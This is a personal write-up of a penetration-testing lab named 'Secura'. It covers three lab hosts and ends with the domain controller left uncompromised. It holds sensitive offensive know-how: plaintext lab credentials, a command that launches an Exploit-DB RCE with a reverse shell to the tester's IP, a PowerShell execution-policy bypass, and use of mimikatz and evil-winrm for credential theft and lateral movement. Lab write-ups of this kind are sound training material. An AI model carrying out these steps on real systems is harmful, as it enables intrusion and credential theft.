Skip to content

Secura

Network

Given:

  • 192.168.180.0/24

Found:

  • 192.168.180.95
  • 192.168.180.96
  • 192.168.180.97 / DC01

Creds

admin:admin (applications manager portal)
administrator:Reality2Show4!.? (local admin on 192.168.180.95)
apache:New2Era4.! (local account on 192.168.180.96)
administrator:Almost4There8.? (local account on 192.168.180.96, found in MySQL on 192.168.180.96)
charlotte:Game20n4.! (MySQL on 192.168.180.96)

other users:
michael

Enumeration

Ping sweeping the subnet gives us three machines.

192.168.180.95

Enumeration

Going to port 5001, we can see that the web server is on port 44444.

On port 44444, we can see the main page of the service: Applications Manager by ManageEngine.

Clicking on "First time user?" gives us the default credentials admin:admin.

Inside, we can see the application panel.

Initial Access

Searching for vulnerabilities, we try the authenticated RCE exploit: https://www.exploit-db.com/exploits/48793

We have to edit the script and change the Java version to 8 for the script to work.

Start a listener on port 6666 and execute the script like this:

$ python rce.py http://192.168.180.95:44444 admin admin 192.168.45.229 6666

And we get a shell.

Post Exploitation

We transfer winPEAS and adPEAS to the host using a Python server and then iwr.

To execute the script, we need to bypass PowerShell protection with:

powershell -ep bypass

Then import and invoke the script:

We find Charlotte, who is a member of the Remote Management Users group, so we can RDP with her account.

After that, we execute winPEAS.

Found autologon credentials for Administrator.

And all the users and groups.

Transfer mimikatz to the machine and:

Check with CME, and it's a local account for the other machine.

Trying with winrm, we can connect as a local account.

To get the flag, use evil-winrm with Administrator.

192.168.180.96

Enumeration

Initial Access

Connect to this machine with evil-winrm using credentials we found on 192.168.180.95.

Privilege Escalation

We found a XAMPP folder. Inside, we found MySQL binaries, and the current user has permissions to execute them.

We got administrator:Almost4There8.? and charlotte:Game20n4.!.

Post Exploitation

We reconnect with admin rights and get the flag.

192.168.180.97

Enumeration

We can see that this host is the domain controller called dc01.secura.yzx.

We can use evil-winrm with Charlotte's credentials, but it is not working due to the lab's instability.

Bug

I couldn't finish this lab even after following the walkthroughs. The lab is super unstable.